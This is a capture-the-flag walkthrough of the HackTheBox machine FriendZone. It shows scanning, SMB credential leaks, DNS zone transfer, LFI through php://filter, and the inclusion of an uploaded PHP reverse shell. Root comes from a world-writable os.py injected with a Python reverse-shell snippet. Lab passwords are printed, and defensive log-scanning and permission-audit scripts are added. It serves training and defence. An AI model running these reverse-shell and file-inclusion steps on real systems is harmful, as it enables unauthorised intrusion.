HackTheBox-FriendZone


title: HackTheBox-FriendZone
author: Crazyinside
layout: true
categories: HackTheBox
cover: https://www.worldisend.com/img/FriendZone.png
tags:
  - Linux


Recon:

Crazy:~/HackThebox/FriendZone$ sudo masscan -p1-65535,U:1-65535 --rate 2000 -e tun0 10.10.10.123
[sudo] crazyinside 的密码:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-08-21 23:09:34 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 22/tcp on 10.10.10.123
Discovered open port 445/tcp on 10.10.10.123
Discovered open port 53/udp on 10.10.10.123
Discovered open port 53/tcp on 10.10.10.123
Discovered open port 80/tcp on 10.10.10.123
Discovered open port 21/tcp on 10.10.10.123
Discovered open port 137/udp on 10.10.10.123
Discovered open port 139/tcp on 10.10.10.123
Discovered open port 443/tcp on 10.10.10.123
Crazy:~/HackThebox/FriendZone$ sudo nmap -sC -sV 10.10.10.123 -p22,445,53,80,21,137,139,443 -oN FriendZoneport
Starting Nmap 7.92SVN ( https://ParrotOS.org ) at 2022-08-22 07:13 CST
Nmap scan report for 10.10.10.123
Host is up (0.11s latency).

PORT    STATE  SERVICE     VERSION
21/tcp  open   ftp         vsftpd 3.0.3
22/tcp  open   ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a96824bc971f1e54a58045e74cd9aaa0 (RSA)
|   256 e5440146ee7abb7ce91acb14999e2b8e (ECDSA)
|_  256 004e1a4f33e8a0de86a6e42a5f84612b (ED25519)
53/tcp  open   domain      ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp  open   http        Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
137/tcp closed netbios-ns
139/tcp open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open   ssl/http    Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after:  2018-11-04T21:02:30
| tls-alpn: 
|_  http/1.1
|_ssl-date: TLS randomness does not represent time
|_http-title: 404 Not Found
445/tcp open   netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time: 
|   date: 2022-08-21T23:13:49
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
|_clock-skew: mean: -1h00m00s, deviation: 1h43m55s, median: -1s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: , NetBIOS MAC: 000000000000 (Xerox)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: friendzone
|   NetBIOS computer name: FRIENDZONE\x00
|   Domain name: \x00
|   FQDN: friendzone
|_  System time: 2022-08-22T02:13:49+03:00

Service detection performed. Please report any incorrect results at https://ParrotOS.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.74 seconds
zsh: segmentation fault  sudo nmap -sC -sV 10.10.10.123 -p22,445,53,80,21,137,139,443 -oN

The page on port 80 has nothing but one image and a few sentences.

Crazy:~/HackThebox/FriendZone$ curl -I 10.10.10.123
HTTP/1.1 200 OK
Date: Sun, 21 Aug 2022 23:15:19 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Fri, 05 Oct 2018 22:52:00 GMT
ETag: "144-577831e9005e6"
Accept-Ranges: bytes
Content-Length: 324
Vary: Accept-Encoding
Content-Type: text/html
Crazy:~/HackThebox/FriendZone$ sudo vim /etc/hosts
[sudo] crazyinside 的密码:
Crazy:~/HackThebox/FriendZone$ dirsearch -u http://friendzoned.htb

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/crazyinside/.dirsearch/reports/friendzoned.htb/_22-08-22_07-16-52.txt

Error Log: /home/crazyinside/.dirsearch/logs/errors-22-08-22_07-16-52.log

Target: http://friendzoned.htb/

[07:16:52] Starting: 
[07:17:00] 403 -  304B - /.htaccess.bak1
[07:17:00] 403 -  304B - /.htaccess.orig
[07:17:00] 403 -  306B - /.htaccess.sample
[07:17:00] 403 -  302B - /.htaccessOLD
[07:17:00] 403 -  304B - /.htaccess.save
[07:17:00] 403 -  303B - /.htaccessOLD2
[07:17:00] 403 -  304B - /.htaccess_orig
[07:17:00] 403 -  302B - /.htaccessBAK
[07:17:00] 403 -  305B - /.htaccess_extra
[07:17:00] 403 -  301B - /.ht_wsr.txt
[07:17:00] 403 -  302B - /.htaccess_sc
[07:17:00] 403 -  304B - /.htpasswd_test
[07:17:00] 403 -  300B - /.htpasswds
[07:17:00] 403 -  301B - /.httr-oauth
[07:17:00] 403 -  294B - /.htm
[07:17:00] 403 -  295B - /.html
[07:17:02] 403 -  294B - /.php
[07:17:50] 200 -  324B - /index.html
[07:17:50] 200 -   11KB - /index.bak
[07:18:09] 200 -   13B - /robots.txt
[07:18:10] 403 -  304B - /server-status/
[07:18:10] 403 -  303B - /server-status
[07:18:22] 200 -  750B - /wordpress/

Task Completed
Crazy:~/HackThebox/FriendZone$

Port 80 still has a few things worth a look; wordpress turns out to be an empty directory:

Crazy:~/HackThebox/FriendZone$ curl http://friendzoned.htb/robots.txt
seriously ?!
Crazy:~/HackThebox/FriendZone$ file index.bak
index.bak: HTML document, ASCII text

Perhaps there is nothing here after all.

Crazy:~/HackThebox/FriendZone$ smbmap -H friendzoned.htb -u whoami
[+] Guest session       IP: friendzoned.htb:445 Name: unknown
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        Files                                                   NO ACCESS       FriendZone Samba Server Files /etc/Files
        general                                                 READ ONLY       FriendZone Samba Server Files
        Development                                             READ, WRITE     FriendZone Samba Server Files
        IPC$                                                    NO ACCESS       IPC Service (FriendZone server (Samba, Ubuntu))
Crazy:~/HackThebox/FriendZone$ smbclient //10.10.10.123/Development -U "whoami"
Password for [WORKGROUP\whoami]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Aug 22 07:17:22 2022
  ..                                  D        0  Thu Jan 24 05:51:02 2019

                9221460 blocks of size 1024. 6456928 blocks available
smb: \> exit
Crazy:~/HackThebox/FriendZone$

SMB exposes one share that can be both read and written, but it is completely empty. The other readable share holds a credential file:

Crazy:~/HackThebox/FriendZone$ smbclient //10.10.10.123/general -U "whoami"
Password for [WORKGROUP\whoami]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Jan 17 04:10:51 2019
  ..                                  D        0  Thu Jan 24 05:51:02 2019
  creds.txt                           N       57  Wed Oct 10 07:52:42 2018

                9221460 blocks of size 1024. 6457724 blocks available
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> exit
Crazy:~/HackThebox/FriendZone$ cat creds.txt
creds for the admin THING:
admin:WORKWORKHhallelujah@#

The page on 443 is empty:

But the certificate shows another domain name, so perhaps my local hosts entry is simply wrong:

It seems so:

Crazy:~/HackThebox/FriendZone$ curl -k -I https://friendzone.red/
HTTP/1.1 200 OK
Date: Sun, 21 Aug 2022 23:39:04 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Fri, 05 Oct 2018 21:18:21 GMT
ETag: "ee-57781cf9aaa2d"
Accept-Ranges: bytes
Content-Length: 238
Vary: Accept-Encoding
Content-Type: text/html

There is something in the comments of the page source:

FriendZone escape software

Ready to escape from friend zone !

src="e.gif">

The comments also carry a hint:

For now I don't know what it is:

Crazy:~/HackThebox/FriendZone$ echo "amwwNkdvQTZIbjE2NjExMjUyNTZOeER1REUyeDZR"|base64 -d
jl06GoA6Hn1661125256NxDuDE2x6Q
Crazy:~/HackThebox/FriendZone$ echo "amwwNkdvQTZIbjE2NjExMjUyNTZOeER1REUyeDZR"|base64 -d|base64 -d
�]:▒�:}z�]vnz7

Directory enumeration turns up admin:

Crazy:~/HackThebox/FriendZone$ dirsearch -u https://friendzone.red/

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/crazyinside/.dirsearch/reports/friendzone.red/-_22-08-22_07-40-33.txt

Error Log: /home/crazyinside/.dirsearch/logs/errors-22-08-22_07-40-33.log

Target: https://friendzone.red/

[07:40:34] Starting: 
[07:40:39] 301 -  315B - /js  ->  https://friendzone.red/js/
[07:40:41] 403 -  301B - /.ht_wsr.txt
[07:40:41] 403 -  304B - /.htaccess.orig
[07:40:41] 403 -  304B - /.htaccess.bak1
[07:40:41] 403 -  302B - /.htaccess_sc
[07:40:41] 403 -  306B - /.htaccess.sample
[07:40:41] 403 -  304B - /.htaccess_orig
[07:40:41] 403 -  304B - /.htaccess.save
[07:40:41] 403 -  305B - /.htaccess_extra
[07:40:41] 403 -  304B - /.htpasswd_test
[07:40:41] 403 -  300B - /.htpasswds
[07:40:41] 403 -  301B - /.httr-oauth
[07:40:42] 403 -  302B - /.htaccessBAK
[07:40:42] 403 -  295B - /.html
[07:40:42] 403 -  302B - /.htaccessOLD
[07:40:42] 403 -  294B - /.htm
[07:40:42] 403 -  303B - /.htaccessOLD2
[07:40:44] 403 -  294B - /.php
[07:41:00] 301 -  318B - /admin  ->  https://friendzone.red/admin/
[07:41:00] 200 -  742B - /admin/
[07:41:00] 403 -  305B - /admin/.htaccess
[07:41:00] 200 -  742B - /admin/?/login
[07:41:30] 200 -  238B - /index.html
[07:41:32] 200 -  922B - /js/
[07:41:55] 403 -  303B - /server-status
[07:41:55] 403 -  304B - /server-status/

But, like wordpress, it is empty:

Crazy:~/HackThebox/FriendZone$ smbmap -H 10.10.10.123 -u admin -p 'WORKWORKHhallelujah@#'
[+] Guest session       IP: 10.10.10.123:445    Name: friendzone.red
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        Files                                                   NO ACCESS       FriendZone Samba Server Files /etc/Files
        general                                                 READ ONLY       FriendZone Samba Server Files
        Development                                             READ, WRITE     FriendZone Samba Server Files
        IPC$                                                    NO ACCESS       IPC Service (FriendZone server (Samba, Ubuntu))
Crazy:~/HackThebox/FriendZone$

This account does not seem to be valid here.

Crazy:~/HackThebox/FriendZone$ ftp 10.10.10.123
Connected to 10.10.10.123.
220 (vsFTPd 3.0.3)
Name (10.10.10.123:crazyinside): admin
331 Please specify the password.
Password: 
530 Login incorrect.
ftp: Login failed
ftp> ls

FTP doesn't work either. That leaves only DNS:

Crazy:~/HackThebox/FriendZone$ dig axfr friendzone.red @10.10.10.123

; <<>> DiG 9.18.4-2-Debian <<>> axfr friendzone.red @10.10.10.123
;; global options: +cmd
friendzone.red.                 604800  IN  SOA   localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red.                 604800  IN  AAAA  ::1
friendzone.red.                 604800  IN  NS    localhost.
friendzone.red.                 604800  IN  A     127.0.0.1
administrator1.friendzone.red.  604800  IN  A     127.0.0.1
hr.friendzone.red.              604800  IN  A     127.0.0.1
uploads.friendzone.red.         604800  IN  A     127.0.0.1
friendzone.red.                 604800  IN  SOA   localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 107 msec
;; SERVER: 10.10.10.123#53(10.10.10.123) (TCP)
;; WHEN: Mon Aug 22 07:51:17 CST 2022
;; XFR size: 8 records (messages 1, bytes 289)

All of these live on the HTTPS port, and nothing more turned up in their certificates.

This smells like file inclusion.

I tried the second parameter:

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=dashboard

The backend probably does include "pagename" . ".php". The source confirms it:

Crazy:~/HackThebox/FriendZone$ echo "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"|base64 -d
<?php

//echo "Smart photo script for friendzone corp !";
//echo "* Note : we are dealing with a beginner php developer and the application is not tested yet !";

echo "FriendZone Admin !";
$auth = $_COOKIE["FriendZoneAuth"];

if ($auth === "e7749d0f4b4da5d03e6e9196fd1d18f1"){
 echo "";   /* HTML markup inside the echo strings did not survive extraction */
 echo "Smart photo script for friendzone corp !";
 echo "* Note : we are dealing with a beginner php developer and the application is not tested yet !";

 if(!isset($_GET["image_id"])){
  echo "";
  echo "image_name param is missed !";
  echo "please enter it to show the image";
  echo "default is image_id=a.jpg&pagename=timestamp";
 }else{
  $image = $_GET["image_id"];
  echo "";
  echo "Something went worng ! , the script include wrong param !";
  include($_GET["pagename"].".php");
  //echo $_GET["pagename"];
 }
}else{
 echo "You can't see the content ! , please login !";
}
?>
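The include() above takes pagename straight from the query string, which is why the php://filter wrapper can read the script's own source. As an added example (not part of the original writeup), the following Python script shows how a defender would spot this kind of probing in Apache access logs: it flags a page-selector parameter that carries a stream wrapper, an absolute filesystem path, or, going one step beyond this page, ../ traversal. The log lines are constructed, modelled on the requests in this writeup; the parameter-name list is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined-log prefix: client ident user [time] "METHOD TARGET PROTO" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Signals that a page-selector parameter is being fed straight into include():
# a stream wrapper, an absolute filesystem path, or ../ traversal.
WRAPPER_RE = re.compile(r"^(php|file|data|expect|phar|zip|glob|ftp|https?)://", re.I)
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
SUSPECT_PARAMS = {"pagename", "page", "file", "include", "template"}  # assumed names

def classify_param(name, value):
    """Return why a decoded query parameter looks like an LFI probe, or None."""
    if name.lower() not in SUSPECT_PARAMS:
        return None
    if WRAPPER_RE.search(value):
        return "stream wrapper"
    if value.startswith(("/", "\\")):
        return "absolute path"
    if TRAVERSAL_RE.search(value):
        return "directory traversal"
    return None

def scan_access_log(lines):
    """Return (client, status, param, reason) for each request that trips a rule."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        # parse_qsl percent-decodes, so ..%2F.. is inspected as ../..
        for name, value in parse_qsl(urlsplit(target).query):
            reason = classify_param(name, value)
            if reason:
                hits.append((client, int(status), name, reason))
    return hits

# Constructed sample log lines, modelled on the requests made in this writeup.
SAMPLE_LOG = """\
10.10.16.3 - - [22/Aug/2022:07:55:01 +0300] "GET /dashboard.php?image_id=a.jpg&pagename=timestamp HTTP/1.1" 200 742
10.10.16.3 - - [22/Aug/2022:07:58:12 +0300] "GET /dashboard.php?image_id=a.jpg&pagename=php://filter/convert.base64-encode/resource=dashboard HTTP/1.1" 200 3124
10.10.16.3 - - [22/Aug/2022:08:39:20 +0300] "GET /dashboard.php?image_id=a.jpg&pagename=/etc/Development/phpreverseshell HTTP/1.1" 200 118
10.10.16.3 - - [22/Aug/2022:08:40:05 +0300] "GET /dashboard.php?image_id=a.jpg&pagename=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 118
""".splitlines()

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("%s status=%d %s: %s" % hit)
```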

No leads for now, so I looked at the other site, the upload page. My guess was that it is upload.php:

Crazy:~/HackThebox/FriendZone$ curl -k https://uploads.friendzone.red/upload.php
WHAT ARE YOU TRYING TO DO HOOOOOOMAN !
Crazy:~/HackThebox/FriendZone$ echo "PD9waHAKCi8vIG5vdCBmaW5pc2hlZCB5ZXQgLS0gZnJpZW5kem9uZSBhZG1pbiAhCgppZihpc3NldCgkX1BPU1RbImltYWdlIl0pKXsKCmVjaG8gIlVwbG9hZGVkIHN1Y2Nlc3NmdWxseSAhPGJyPiI7CmVjaG8gdGltZSgpKzM2MDA7Cn1lbHNlewoKZWNobyAiV0hBVCBBUkUgWU9VIFRSWUlORyBUTyBETyBIT09PT09PTUFOICEiOwoKfQoKPz4K"|base64 -d
<?php

// not finished yet -- friendzone admin !

if(isset($_POST["image"])){

echo "Uploaded successfully !<br>";
echo time()+3600;
}else{

echo "WHAT ARE YOU TRYING TO DO HOOOOOOMAN !";

}

?>

This upload page is a fake. Thinking back, though, we already have a file inclusion: the appended .php suffix means I can only include PHP files, but SMB left a writable share, and an Nmap script can enumerate the directory each share maps to:

Crazy:~/HackThebox/FriendZone$ nmap --script smb-enum-shares.nse -p445 10.10.10.123
Starting Nmap 7.92SVN ( https://ParrotOS.org ) at 2022-08-22 08:30 CST
Nmap scan report for friendzone.red (10.10.10.123)
Host is up (0.15s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\10.10.10.123\Development: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: 
|     Path: C:\etc\Development
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\Files: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files /etc/Files
|     Users: 0
|     Max Users: 
|     Path: C:\etc\hole
|     Anonymous access: 
|     Current user access: 
|   \\10.10.10.123\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (FriendZone server (Samba, Ubuntu))
|     Users: 1
|     Max Users: 
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\general: 
|     Type: STYPE_DISKTREE
|     Comment: FriendZone Samba Server Files
|     Users: 0
|     Max Users: 
|     Path: C:\etc\general
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\10.10.10.123\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: 
|     Path: C:\var\lib\samba\printers
|     Anonymous access: 
|_    Current user access: 

Nmap done: 1 IP address (1 host up) scanned in 35.73 seconds
zsh: segmentation fault  nmap --script smb-enum-shares.nse -p445 10.10.10.123
Crazy:~/HackThebox/FriendZone$ smbclient //10.10.10.123/Development -U "whoami"
Password for [WORKGROUP\whoami]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Aug 22 08:36:45 2022
  ..                                  D        0  Thu Jan 24 05:51:02 2019

                9221460 blocks of size 1024. 6450228 blocks available
smb: \> put phpreverseshell.php
putting file phpreverseshell.php as \phpreverseshell.php (8.5 kb/s) (average 8.5 kb/s)
smb: \> exit
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/phpreverseshell
Crazy:~/HackThebox/FriendZone$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.123] 37494
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 03:39:33 up  1:30,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@FriendZone:/$ ls
ls
bin   home            lib64       opt   sbin      tmp      vmlinuz.old
boot  initrd.img      lost+found  proc  srv       usr
dev   initrd.img.old  media       root  swapfile  var
etc   lib             mnt         run   sys       vmlinuz
www-data@FriendZone:/$ cd home
cd home
www-data@FriendZone:/home$ ls
ls
friend
www-data@FriendZone:/home$ cd friend
cd friend
www-data@FriendZone:/home/friend$ ls
ls
user.txt
www-data@FriendZone:/home/friend$ cat user.txt
cat user.txt
a9e..............................
www-data@FriendZone:/home/friend$
www-data@FriendZone:/var/www$ ls
admin  friendzone  friendzoneportal  friendzoneportaladmin  html  mysql_data.conf  uploads
www-data@FriendZone:/var/www$ cat mysql_data.conf
for development process this is the mysql creds for user friend

db_user=friend

db_pass=Agpyu12!0.213$

db_name=FZ
www-data@FriendZone:/var/www$
friend@FriendZone:/opt/server_admin$ ls
reporter.py
friend@FriendZone:/opt/server_admin$ cat reporter.py
#!/usr/bin/python

import os

to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

#os.system(command)

# I need to edit the script later

# Sam ~ python developer
friend@FriendZone:/opt/server_admin$

The Python script imports the os library, and there is a cron job that runs it every two minutes:

2019/02/12 15:18:01 CMD: UID=0    PID=26106  | /usr/bin/python /opt/server_admin/reporter.py
2019/02/12 15:18:01 CMD: UID=0    PID=26105  | /bin/sh -c /opt/server_admin/reporter.py
2019/02/12 15:18:01 CMD: UID=0    PID=26104  | /usr/sbin/CRON -f
2019/02/12 15:20:01 CMD: UID=0    PID=26109  | /usr/bin/python /opt/server_admin/reporter.py
2019/02/12 15:20:01 CMD: UID=0    PID=26108  | /bin/sh -c /opt/server_admin/reporter.py
2019/02/12 15:20:01 CMD: UID=0    PID=26107  | /usr/sbin/CRON -f

I have no permission to write to the script itself, but the os library looks writable:

friend@FriendZone:/usr/lib/python2.7$ find -type f -writable -ls
   262202     28 -rw-rw-r--   1 friend   friend      25583 Jan 15  2019 ./os.pyc
   282643     28 -rwxrwxrwx   1 root     root        25910 Jan 15  2019 ./os.py
friend@FriendZone:/usr/lib/python2.7$

rwx.

import pty
import socket

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.16.3",1338))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
pty.spawn("/bin/bash")
s.close()
Crazy:~/HackThebox/FriendZone$ nc -lvnp 1338
listening on [any] 1338 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.123] 50348
root@FriendZone:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@FriendZone:~# cat /root/root.txt
cat /root/root.txt
b0..............................
root@FriendZone:~#
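The root cause of the privilege escalation is a world-writable /usr/lib/python2.7/os.py being imported by a cron job that runs as root. As an added check (not part of the original writeup), this Python script walks the interpreter's module search path and reports entries that a non-root user could modify, or that are not owned by the expected uid; demo() runs the same audit over a constructed fixture that mirrors the find output above.

```python
import os
import stat
import sys
import tempfile

def audit_module_dirs(directories, expected_uid=0):
    """Report files under module search directories that an unprivileged user could tamper with.

    Returns a sorted list of (path, mode_string, reason). An entry is flagged when it is
    group- or world-writable, or when it is not owned by expected_uid (stdlib files are root's).
    """
    findings = []
    for d in directories:
        for root, dirs, files in os.walk(d):
            for name in dirs + files:
                path = os.path.join(root, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if stat.S_ISLNK(st.st_mode):
                    continue  # the link target is judged where it lives
                reasons = []
                if st.st_mode & stat.S_IWOTH:
                    reasons.append("world-writable")
                elif st.st_mode & stat.S_IWGRP:
                    reasons.append("group-writable")
                if expected_uid is not None and st.st_uid != expected_uid:
                    reasons.append("owned by uid %d" % st.st_uid)
                if reasons:
                    findings.append((path, stat.filemode(st.st_mode), ", ".join(reasons)))
    return sorted(findings)

def demo():
    """Constructed fixture: a fake lib dir holding a 0777 os.py (the FriendZone case),
    a group-writable os.pyc and a sane 0644 sys.py. Returns {filename: reason}."""
    lib = tempfile.mkdtemp(prefix="fakelib-")
    for name, mode in (("os.py", 0o777), ("os.pyc", 0o664), ("sys.py", 0o644)):
        p = os.path.join(lib, name)
        with open(p, "w") as fh:
            fh.write("# placeholder module\n")
        os.chmod(p, mode)
    # The fixture is ours, so expected_uid is our own uid; on a real host pass 0.
    return {os.path.basename(p): r for p, _m, r in audit_module_dirs([lib], os.getuid())}

if __name__ == "__main__":
    dirs = [p for p in sys.path if p and os.path.isdir(p)]
    for path, mode, reason in audit_module_dirs(dirs, expected_uid=0):
        print("%s %s  %s" % (mode, path, reason))
```

Running it unprivileged is enough, since the check only needs to stat files; a writable os.py (or any other module the cron job imports) on a root-run interpreter's path is the finding to fix.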